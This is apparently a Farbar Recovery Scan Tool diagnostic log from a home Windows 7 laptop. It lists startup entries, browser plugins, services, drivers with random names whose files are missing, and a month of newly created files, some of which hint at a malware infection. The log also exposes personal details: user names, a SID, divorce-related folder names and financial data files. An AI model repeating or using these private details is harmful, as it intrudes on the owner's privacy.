(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe

==================== Registry (Whitelisted) ==================

HKU\.DEFAULT\...\RunOnce: [{90140000-003D-0000-1000-0000000FF1CE}] - C:\Windows\system32\cmd.exe /C del "C:\ProgramData\Microsoft Help\Rgstrtn.lck" /Q /A:H
HKU\S-1-5-21-3536542363-2189832666-3084334477-1001\...\MountPoints2: E - E:\LaunchU3.exe -a
HKU\S-1-5-21-3536542363-2189832666-3084334477-1001\...\MountPoints2: {24887a34-a929-11e3-a865-00038a000015} - E:\LaunchU3.exe -a
Startup: C:\Users\Ric\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk
ShortcutTarget: Dropbox.lnk -> C:\Users\Ric\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
ShellIconOverlayIdentifiers: Carbonite.Green -> {95A27763-F62A-4114-9072-E81D87DE3B68} => C:\Program Files\Carbonite\Carbonite Backup\CarboniteNSE.dll (Carbonite, Inc.)
ShellIconOverlayIdentifiers: Carbonite.Partial -> {E300CD91-100F-4E67-9AF3-1384A6124015} => C:\Program Files\Carbonite\Carbonite Backup\CarboniteNSE.dll (Carbonite, Inc.)
ShellIconOverlayIdentifiers: Carbonite.Yellow -> {5E529433-B50E-4bef-A63B-16A6B71B071A} => C:\Program Files\Carbonite\Carbonite Backup\CarboniteNSE.dll (Carbonite, Inc.)
ShellIconOverlayIdentifiers: DropboxExt1 -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: DropboxExt2 -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: DropboxExt3 -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: DropboxExt4 -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers-x32: Carbonite.Green -> {95A27763-F62A-4114-9072-E81D87DE3B68} => C:\Program Files (x86)\Carbonite\Carbonite Backup\CarboniteNSE.dll (Carbonite, Inc.)
ShellIconOverlayIdentifiers-x32: Carbonite.Partial -> {E300CD91-100F-4E67-9AF3-1384A6124015} => C:\Program Files (x86)\Carbonite\Carbonite Backup\CarboniteNSE.dll (Carbonite, Inc.)
ShellIconOverlayIdentifiers-x32: Carbonite.Yellow -> {5E529433-B50E-4bef-A63B-16A6B71B071A} => C:\Program Files (x86)\Carbonite\Carbonite Backup\CarboniteNSE.dll (Carbonite, Inc.)
ShellIconOverlayIdentifiers-x32: DropboxExt1 -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers-x32: DropboxExt2 -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers-x32: DropboxExt3 -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} =>  No File

==================== Internet (Whitelisted) ====================

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0x9EFC09E253D5CB01
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-us
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.msn.com/?ocid=OIE9HP
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Restore = http://www.msn.com/?ocid=OIE9HP
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com/ie
SearchScopes: HKLM-x32 - DefaultScope value is missing.
SearchScopes: HKCU - DefaultScope {4C57D5F1-EA69-4478-82D3-94C509422F49} URL = http://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}&ie={inputEncoding}&oe={outputEncoding}&startIndex={startIndex?}&startPage={startPage}
SearchScopes: HKCU - {4C57D5F1-EA69-4478-82D3-94C509422F49} URL = http://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}&ie={inputEncoding}&oe={outputEncoding}&startIndex={startIndex?}&startPage={startPage}
SearchScopes: HKCU - {A3F26D1D-B8BE-4F06-BAE2-B3A52A885078} URL = http://search.yahoo.com/search?fr=mcafee&p={SearchTerms}
SearchScopes: HKCU - {DECA3892-BA8F-44b8-A993-A466AD694AE4} URL = http://search.yahoo.com/search?p={searchTerms}&fr=chr-offrhap
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: ContributeBHO Class -> {074C1DC5-9320-4A9A-947D-C042949C6216} -> C:\Program Files (x86)\Adobe\Adobe Contribute CS5\Plugins\IEPlugin\contributeieplugin.dll (Adobe Systems, Inc.)
BHO-x32: MSS+ Identifier -> {0E8A89AD-95D7-40EB-8D9D-083EF7066A01} -> C:\Program Files\McAfee Security Scan\3.8.150\McAfeeMSS_IE.dll (McAfee, Inc.)
BHO-x32: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexbho.dll (CANON INC.)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Windows Live Messenger Companion Helper -> {9FDDE16B-836F-4806-AB1F-1455CBEFF289} -> C:\Program Files (x86)\Windows Live\Companion\companioncore.dll (Microsoft Corporation)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre6\bin\jp2ssv.dll (Sun Microsystems, Inc.)
Toolbar: HKLM-x32 - Contribute Toolbar - {517BDDE4-E3A7-4570-B21E-2B52B6139FC7} - C:\Program Files (x86)\Adobe\Adobe Contribute CS5\Plugins\IEPlugin\contributeieplugin.dll (Adobe Systems, Inc.)
Toolbar: HKLM-x32 - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexhlp.dll (CANON INC.)
DPF: HKLM {49312E18-AA92-4CC2-BB97-55DEA7BCADD6} https://support.dell.com/systemprofiler/SysProExe.CAB
DPF: HKLM-x32 {49312E18-AA92-4CC2-BB97-55DEA7BCADD6} https://support.dell.com/systemprofiler/SysProExe.CAB
DPF: HKLM-x32 {C1F8FC10-E5DB-4112-9DBF-6C3FF728D4E3} http://support.dell.com/systemprofiler/DellSystemLite.CAB
DPF: HKLM-x32 {D27CDB6E-AE6D-11CF-96B8-444553540000} http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
DPF: HKLM-x32 {E06E2E99-0AA1-11D4-ABA6-0060082AA75C} https://akamaicdn.webex.com/client/WBXclient-T28L10NSP12_CP1-16851/webex/ieatgpc1.cab
DPF: HKLM-x32 {FFB3A759-98B1-446F-BDA9-909C6EB18CC7} http://utilities.pcpitstop.com/Optimize3/pcpitstop2.dll
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1 205.171.3.26 205.171.2.26

FireFox:
========
FF Plugin: @adobe.com/FlashPlayer - C:\Windows\system32\Macromed\Flash\NPSWF64_13_0_0_214.dll ()
FF Plugin: @microsoft.com/GENUINE - C:\Windows\system32\Wat\npWatWeb.dll (Microsoft Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 - c:\Program Files\Microsoft Silverlight\5.1.30214.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 - C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer - C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_13_0_0_214.dll ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @canon.com/EPPEX - C:\Program Files (x86)\Canon\My Image Garden\AddOn\CIG\npmigfpi.dll (CANON INC.)
FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 - C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll (Google, Inc.)
FF Plugin-x32: @java.com/JavaPlugin - C:\Program Files (x86)\Java\jre6\bin\new_plugin\npjp2.dll (Sun Microsystems, Inc.)
FF Plugin-x32: @microsoft.com/GENUINE - C:\Windows\system32\Wat\npWatWeb.dll (Microsoft Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 - c:\Program Files (x86)\Microsoft Silverlight\5.1.30214.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 - C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 - C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 - C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 - C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: Adobe Reader - C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @talk.google.com/GoogleTalkPlugin - C:\Users\Ric\AppData\Roaming\Mozilla\plugins\npgoogletalk.dll (Google)
FF Plugin HKCU: @talk.google.com/O1DPlugin - C:\Users\Ric\AppData\Roaming\Mozilla\plugins\npo1d.dll (Google)
FF Plugin HKCU: @tools.google.com/Google Update;version=3 - C:\Users\Ric\AppData\Local\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin HKCU: @tools.google.com/Google Update;version=9 - C:\Users\Ric\AppData\Local\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin HKCU: amazon.com/AmazonMP3DownloaderPlugin - C:\Program Files (x86)\Amazon\MP3 Downloader\npAmazonMP3DownloaderPlugin10171.dll (Amazon.com, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\NPOFF12.DLL (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin2.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin3.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin4.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin5.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Users\Ric\AppData\Roaming\mozilla\plugins\npgoogletalk.dll (Google)
FF Plugin ProgramFiles/Appdata: C:\Users\Ric\AppData\Roaming\mozilla\plugins\npo1d.dll (Google)
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\searchplugins\aolsearch.xml
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\searchplugins\McSiteAdvisor.xml
FF HKLM-x32\...\Firefox\Extensions: [{01A8CA0A-4C96-465b-A49B-65C46FAD54F9}] - C:\Program Files (x86)\Adobe\Adobe Contribute CS5\Plugins\FirefoxPlugin\{01A8CA0A-4C96-465b-A49B-65C46FAD54F9}
FF Extension: Adobe Contribute Toolbar - C:\Program Files (x86)\Adobe\Adobe Contribute CS5\Plugins\FirefoxPlugin\{01A8CA0A-4C96-465b-A49B-65C46FAD54F9} [2011-02-26]
FF HKLM-x32\...\Thunderbird\Extensions: [msktbird@mcafee.com] - C:\Program Files\McAfee\MSK
FF StartMenuInternet: FIREFOX.EXE - firefox.exe

Chrome:
=======
CHR HomePage: hxxp://www.msn.com/?pc=BDT3&ocid=BDT3DHP&dt=101013
CHR StartupUrls: "hxxp://www.msn.com/?pc=BDT3&ocid=BDT3DHP&dt=101013",
   "hxxp://blank/"
CHR Extension: (Plug-in Terminal Class) - C:\Users\Ric\AppData\Local\Google\Chrome\User Data\Default\Extensions\ajpgkpeckebdhofmmjfgcjjiiejpodla [2014-06-05]
CHR Extension: (Google Docs) - C:\Users\Ric\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2013-10-06]
CHR Extension: (Google Drive) - C:\Users\Ric\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2013-10-06]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Ric\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-05-27]
CHR Extension: (YouTube) - C:\Users\Ric\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2011-12-21]
CHR Extension: (Google Search) - C:\Users\Ric\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2011-12-21]
CHR Extension: (Google Wallet) - C:\Users\Ric\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-09-04]
CHR Extension: (Gmail) - C:\Users\Ric\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2011-12-21]

==================== Services (Whitelisted) =================

R2 9734BF6A-2DCD-40f0-BAB0-5AAFEEBE1269; C:\Program Files (x86)\Roxio\BackOnTrack\App\SaibSVC.exe [457200 2009-06-02] ()
S3 Adobe LM Service; C:\Program Files (x86)\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe [72704 2011-03-02] (Adobe Systems) [File not signed]
R2 BcmBtRSupport; C:\Windows\system32\BtwRSupportService.exe [2255064 2013-10-28] (Broadcom Corporation.)
R2 BOT4Service; C:\Program Files (x86)\Roxio\BackOnTrack\App\BService.exe [32240 2010-07-14] ()
R2 CLCapSvc; C:\Program Files (x86)\ATI\Catalyst Media Center\Kernel\TV\CLCapSvc.exe [262239 2007-08-02] () [File not signed]
R2 CLSched; C:\Program Files (x86)\ATI\Catalyst Media Center\Kernel\TV\CLSched.exe [110685 2007-08-02] () [File not signed]
R2 CyberLink Media Library Service; C:\Program Files (x86)\ATI\Catalyst Media Center\Kernel\CLML_NTService\CLMLServer.exe [1073152 2007-08-02] (Cyberlink) [File not signed]
R2 Fitbit Connect; C:\Program Files (x86)\Fitbit Connect\FitbitConnectService.exe [1436192 2014-05-19] (Fitbit, Inc.)
R2 IJPLMSVC; C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE [140456 2011-09-06] ()
S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.8.150\McCHSvc.exe [289256 2014-04-09] (McAfee, Inc.)
R2 PCPitstop Scheduling; C:\Program Files (x86)\PCPitstop\PCPitstopScheduleService.exe [86016 2010-09-13] (PC Pitstop LLC) [File not signed]
R2 QDLService2kDell; C:\Program Files (x86)\QUALCOMM\QDLService2k\QDLService2kDell.exe [330488 2010-01-14] (QUALCOMM, Inc.)
S3 RoxMediaDB13; C:\Program Files (x86)\Common Files\Roxio Shared\13.0\SharedCOM\RoxMediaDB13.exe [1099248 2010-07-16] (Sonic Solutions)
R2 STacSV; C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_0057cbec48a2d7cf\STacSV64.exe [244736 2010-01-21] (IDT, Inc.)
S3 SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [File not signed]
R2 WMCoreService; C:\Program Files (x86)\Dell\Dell WWAN\WMCore\mini_WMCore.exe [447488 2009-11-26] () [File not signed]
S4 x10nets; C:\Program Files (x86)\Trivia Board Pro 4\X10nets.exe [20480 2001-11-12] (X10) [File not signed]

==================== Drivers (Whitelisted) ====================

S3 61883; C:\Windows\System32\DRIVERS\61883.sys [60288 2009-07-13] (Microsoft Corporation)
S3 ATIAVPCI; C:\Windows\System32\DRIVERS\atinavrr.sys [1200512 2007-07-05] (ATI Technologies Inc.)
R3 bcbtums; C:\Windows\System32\drivers\bcbtums.sys [170712 2013-10-28] (Broadcom Corporation.)
R3 ITECIRfilter; C:\Windows\System32\DRIVERS\ITECIRfilter.sys [28264 2011-03-22] (ITE Tech. Inc. )
S3 Netaapl; C:\Windows\System32\DRIVERS\netaapl64.sys [22528 2011-05-10] (Apple Inc.) [File not signed]
S3 RimUsb; C:\Windows\System32\Drivers\RimUsb_AMD64.sys [74752 2011-07-25] (Research In Motion Limited)
S3 RimVSerPort; C:\Windows\System32\DRIVERS\RimSerial_AMD64.sys [44032 2011-07-20] (Research in Motion Ltd)
R2 TurboB; C:\Windows\System32\DRIVERS\TurboB.sys [13784 2009-11-02] ()
U5 VWiFiFlt; C:\Windows\System32\Drivers\VWiFiFlt.sys [59904 2009-07-13] (Microsoft Corporation)
S1 qnmokglx; \??\C:\Windows\system32\drivers\qnmokglx.sys [X]
S1 smvowoli; \??\C:\Windows\system32\drivers\smvowoli.sys [X]
S3 wanatw; system32\DRIVERS\wanatw64.sys [X]
S0 xnvdb; System32\drivers\cixf.sys [X]

==================== NetSvcs (Whitelisted) ===================

==================== One Month Created Files and Folders ========

2014-07-16 10:53 - 2014-07-16 10:58 - 00019485 _____ () C:\Users\Ric\Desktop\FRST.txt
2014-07-16 10:48 - 2014-07-16 10:53 - 00000000 ____D () C:\FRST
2014-07-16 10:47 - 2014-07-16 10:47 - 02086912 _____ (Farbar) C:\Users\Ric\Desktop\FRST64.exe
2014-07-15 23:25 - 2014-07-15 23:25 - 00021104 _____ () C:\Users\Ric\Desktop\dds.txt
2014-07-15 23:25 - 2014-07-15 23:25 - 00013578 _____ () C:\Users\Ric\Desktop\attach.txt
2014-07-15 23:04 - 2014-07-15 23:04 - 00688992 ____R (Swearware) C:\Users\Ric\Desktop\dds.com
2014-07-14 11:20 - 2014-07-14 11:20 - 00000207 _____ () C:\Windows\tweaking.com-regbackup-DELL-XPS-1645-Microsoft-Windows-7-Professional-(64-bit).dat
2014-07-14 11:20 - 2014-07-14 11:20 - 00000000 ____D () C:\RegBackup
2014-07-14 09:20 - 2014-07-14 09:20 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tweaking.com
2014-07-14 09:20 - 2014-07-14 09:20 - 00000000 ____D () C:\Program Files (x86)\Tweaking.com
2014-07-12 12:44 - 2014-07-12 22:45 - 00000004 _____ () C:\Windows\msoffice.ini
2014-07-12 12:44 - 2014-07-12 22:45 - 00000000 ____D () C:\Users\Ric\Desktop\AOL Saved PFC
2014-07-11 15:26 - 2014-07-11 15:26 - 00002358 _____ () C:\Users\Ric\Desktop\JRT.txt
2014-07-11 15:19 - 2014-07-11 15:19 - 00000000 ____D () C:\Windows\ERUNT
2014-07-11 14:58 - 2014-07-12 13:01 - 00000000 ____D () C:\Kits
2014-07-11 14:26 - 2014-07-11 14:26 - 01166640 _____ () C:\Windows\Minidump\071114-42635-01.dmp
2014-07-09 15:33 - 2014-07-09 15:34 - 00000000 ____D () C:\Users\roy\1
2014-07-06 14:20 - 2010-08-30 08:34 - 00536576 _____ (SQLite Development Team) C:\Windows\SysWOW64\sqlite3.dll
2014-07-06 14:17 - 2014-07-13 14:11 - 00000000 ____D () C:\AdwCleaner
2014-07-06 14:15 - 2014-07-06 14:15 - 00000000 ____D () C:\Users\Ric\AppData\Local\GHISLER
2014-07-06 13:47 - 2014-07-06 13:47 - 00000000 __SHD () C:\Users\roy\AppData\Local\EmieUserList
2014-07-06 13:47 - 2014-07-06 13:47 - 00000000 __SHD () C:\Users\roy\AppData\Local\EmieSiteList
2014-07-06 11:47 - 2014-07-14 11:00 - 00122584 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-07-06 11:46 - 2014-07-06 11:46 - 00001106 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-07-06 11:46 - 2014-07-06 11:46 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-07-06 11:46 - 2014-07-06 11:46 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-07-06 11:46 - 2014-07-06 11:46 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-07-06 11:46 - 2014-05-12 07:26 - 00091352 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-07-06 11:46 - 2014-05-12 07:26 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-07-06 11:46 - 2014-05-12 07:25 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-07-05 22:06 - 2014-07-05 22:06 - 00000000 ____D () C:\Users\roy\AppData\Local\GHISLER
2014-07-05 22:04 - 2014-07-05 22:04 - 00000736 _____ () C:\Users\Public\Desktop\Total Commander 64 bit.lnk
2014-07-05 22:04 - 2014-07-05 22:04 - 00000722 _____ () C:\Users\Public\Desktop\Total Commander.lnk
2014-07-05 22:04 - 2014-07-05 22:04 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Total Commander
2014-07-05 14:46 - 2014-07-05 14:46 - 00000000 ____D () C:\Users\roy\AppData\Roaming\Notepad++
2014-07-05 14:25 - 2014-07-05 14:25 - 00453480 _____ () C:\Users\roy\AppData\Local\GDIPFONTCACHEV1.DAT
2014-07-05 14:23 - 2014-07-05 14:23 - 00001417 _____ () C:\Users\roy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2014-07-05 14:23 - 2014-07-05 14:23 - 00000000 ____D () C:\Users\roy\AppData\Roaming\Apple Computer
2014-07-05 14:23 - 2014-07-05 14:23 - 00000000 ____D () C:\Users\roy\AppData\Roaming\Adobe
2014-07-05 14:23 - 2014-07-05 14:23 - 00000000 ____D () C:\Users\roy\AppData\Local\Google
2014-07-05 14:22 - 2014-07-09 15:33 - 00000000 ____D () C:\Users\roy
2014-07-05 14:22 - 2014-07-05 14:22 - 00000020 ___SH () C:\Users\roy\ntuser.ini
2014-07-05 14:22 - 2014-07-05 14:22 - 00000000 ____D () C:\Users\roy\AppData\Local\VirtualStore
2014-07-05 14:22 - 2011-08-08 15:10 - 00000000 ____D () C:\Users\roy\AppData\Local\Microsoft Help
2014-07-05 14:22 - 2011-03-06 17:02 - 00000000 ____D () C:\Users\roy\AppData\Local\SoftThinks
2014-07-05 14:22 - 2011-02-26 00:54 - 00000000 ____D () C:\Users\roy\AppData\Roaming\Macromedia
2014-07-05 14:22 - 2009-07-14 00:54 - 00000000 ___RD () C:\Users\roy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2014-07-05 14:22 - 2009-07-14 00:49 - 00000000 ___RD () C:\Users\roy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance
2014-07-05 13:53 - 2014-07-05 13:53 - 00139544 ____H () C:\Users\Ric\Downloads\Donna Summer - Last Dance.mp3.z1a
2014-07-05 12:52 - 2014-07-13 13:30 - 00000000 ____D () C:\Roy
2014-07-04 13:27 - 2014-07-04 13:32 - 20787200 _____ () C:\Users\Ric\qdata2010.QDF
2014-07-04 04:24 - 2014-07-04 13:24 - 00001120 _____ () C:\Users\Ric\Downloads\qdata2010 (1)OFXLOG.DAT
2014-07-04 04:19 - 2014-07-04 13:28 - 20787200 _____ () C:\Users\Ric\Downloads\qdata2010 (1).qdf
2014-07-04 04:19 - 2014-07-04 04:19 - 20780389 _____ () C:\Users\Ric\Downloads\qdata2010 (2).qdf
2014-07-02 07:15 - 2014-07-02 07:15 - 00003288 _____ () C:\bootsqm.dat
2014-07-01 21:05 - 2014-07-07 22:27 - 00000000 ____D () C:\Users\Ric\Desktop\Cohey photos
2014-06-25 20:48 - 2014-07-07 23:57 - 00003194 _____ () C:\Windows\System32\Tasks\{72E0739B-EEC6-4FAB-AD23-1B069503C4B5}
2014-06-25 20:26 - 2014-06-25 20:50 - 00000961 ____H () C:\IPH.PH
2014-06-25 20:20 - 2014-06-25 20:20 - 00208400 _____ (AOL LLC.) C:\Users\Ric\Downloads\AOLDNLD.exe
2014-06-25 19:54 - 2014-06-25 20:02 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\Feeqvena
2014-06-25 19:50 - 2014-07-06 13:39 - 00000000 ____D () C:\ProgramData\IculOnse
2014-06-25 19:29 - 2014-06-25 19:30 - 00369792 _____ () C:\Windows\Minidump\062514-34335-01.dmp
2014-06-25 19:23 - 2014-07-01 15:28 - 20742144 _____ () C:\Users\Ric\Downloads\qdata2010.qdf
2014-06-25 19:23 - 2014-07-01 15:27 - 00000896 _____ () C:\Users\Ric\Downloads\qdata2010OFXLOG.DAT
2014-06-23 19:36 - 2014-07-07 22:27 - 00000000 ____D () C:\Users\Ric\Desktop\EB PICS
2014-06-23 19:04 - 2014-06-23 19:05 - 00370536 _____ () C:\Windows\Minidump\062314-33337-01.dmp
2014-06-20 21:32 - 2014-06-20 21:32 - 00000000 ____D () C:\Users\Ric\Documents\Roxio Projects
2014-06-20 21:25 - 2014-07-07 22:27 - 00000000 ____D () C:\Users\Ric\Desktop\Mary picture folder
2014-06-18 16:45 - 2014-07-07 22:27 - 00000000 ____D () C:\Users\Ric\Documents\Divorce Civi lCover Sheet
2014-06-18 16:44 - 2014-06-18 16:45 - 01051112 _____ () C:\Users\Ric\Documents\Divorce Civi lCover Sheet.zip
2014-06-18 16:31 - 2014-06-18 16:32 - 00378088 _____ () C:\Windows\Minidump\061814-37799-01.dmp
2014-06-18 16:20 - 2014-06-18 16:20 - 00262144 _____ () C:\Windows\Minidump\061814-48672-01.dmp
2014-06-18 09:49 - 2014-06-18 09:49 - 00000000 ____D () C:\ProgramData\Package Cache
2014-06-18 09:48 - 2014-06-18 09:48 - 00000000 ____D () C:\TDSSKiller_Quarantine
2014-06-18 09:47 - 2014-06-18 09:47 - 00000000 ____D () C:\AMD
2014-06-18 09:39 - 2014-06-18 09:40 - 00569856 _____ () C:\Windows\Minidump\061814-35069-01.dmp
2014-06-17 16:54 - 2014-06-17 16:55 - 00369840 _____ () C:\Windows\Minidump\061714-74116-01.dmp
2014-06-17 16:42 - 2014-06-17 16:43 - 00369808 _____ () C:\Windows\Minidump\061714-29546-01.dmp
2014-06-16 17:08 - 2014-06-16 17:09 - 00275760 _____ () C:\Windows\Minidump\061614-35178-01.dmp
2014-06-16 16:04 - 2014-07-07 22:27 - 00000000 ____D () C:\Users\Ric\Documents\Divorce folder
2014-06-16 09:54 - 2014-06-16 09:54 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\WMCore
2014-06-16 09:53 - 2014-06-16 09:53 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\WirelessManager
2014-06-16 09:43 - 2014-06-16 09:43 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Intel® Matrix Storage Manager
2014-06-16 09:38 - 2014-07-07 22:27 - 00000000 ____D () C:\ProgramData\QUALCOMM
2014-06-16 09:38 - 2014-06-16 09:38 - 00000000 ____D () C:\Windows\Dell
2014-06-16 09:38 - 2014-06-16 09:38 - 00000000 ____D () C:\Program Files (x86)\QUALCOMM
2014-06-16 09:37 - 2009-12-29 16:36 - 00041280 _____ (Printing Communications Assoc., Inc. (PCAUSA)) C:\Windows\system32\Drivers\PCASp50a64.sys
2014-06-16 09:36 - 2014-06-16 09:36 - 00000000 ____D () C:\ProgramData\Novatel Wireless
2014-06-16 09:30 - 2014-06-16 09:39 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dell Wireless
2014-06-16 09:30 - 2014-06-16 09:30 - 00002310 _____ () C:\Users\Public\Desktop\Dell Mobile Broadband Manager.lnk
2014-06-16 09:24 - 2014-06-16 09:36 - 00000000 ____D () C:\Users\Ric\New folder
2014-06-16 09:18 - 2014-06-16 09:20 - 00000000 ____D () C:\Program Files\IDT
2014-06-16 09:18 - 2014-06-16 09:18 - 00000000 ____D () C:\Windows\system32\SRSLabs
